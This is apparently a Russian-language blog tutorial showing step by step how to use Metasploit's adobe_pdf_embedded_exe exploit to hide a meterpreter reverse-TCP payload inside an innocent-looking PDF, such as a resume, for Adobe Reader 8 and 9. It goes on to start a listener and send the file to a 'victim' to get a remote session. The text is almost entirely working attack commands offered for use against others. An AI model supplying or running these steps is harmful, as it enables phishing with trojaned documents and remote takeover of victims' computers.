Внедрение исполняемого кода в PDF документ
Sam SepiolУязвимость работает в версии программы 8 и 9.
Воспользуемся поиском и найдем эксплоит:
search type:exploit embedded_exe
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Установим пейлоад:
set payload windows/meterpreter/reverse_tcp
options
нас интересует:
FILENAME
INFILENAME
LAUNCH_MESSAGE
LHOST
FILENAME - выходной файл который мы можем отправить пользователю.
set filename forensics.pdf
INFILENAME - это входной файл, любой, например резюме, в формате pdf.
set infilename /root/samsep/Downloads/kniga.pdf
LAUNCH_MESSAGE - та самая уязвимость с которой мы можем изменить текст сообщения (оставляем как есть)
LHOST - ip адрес компьютера с установленным метасплоитом
set lhost 192.168.1.12
exploit
Метасплоит сгенерирует файл и покажет путь к каталогу.
Так как эксплоит сгенерировал только файл нам нужно запустить слушатель:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
устанавливаем параметры для данного модуля:
set lhost 192.168.1.12
run
скидываем файл жертве и ждем сессию.
Документ можно закрыть он не повлияет на сессию.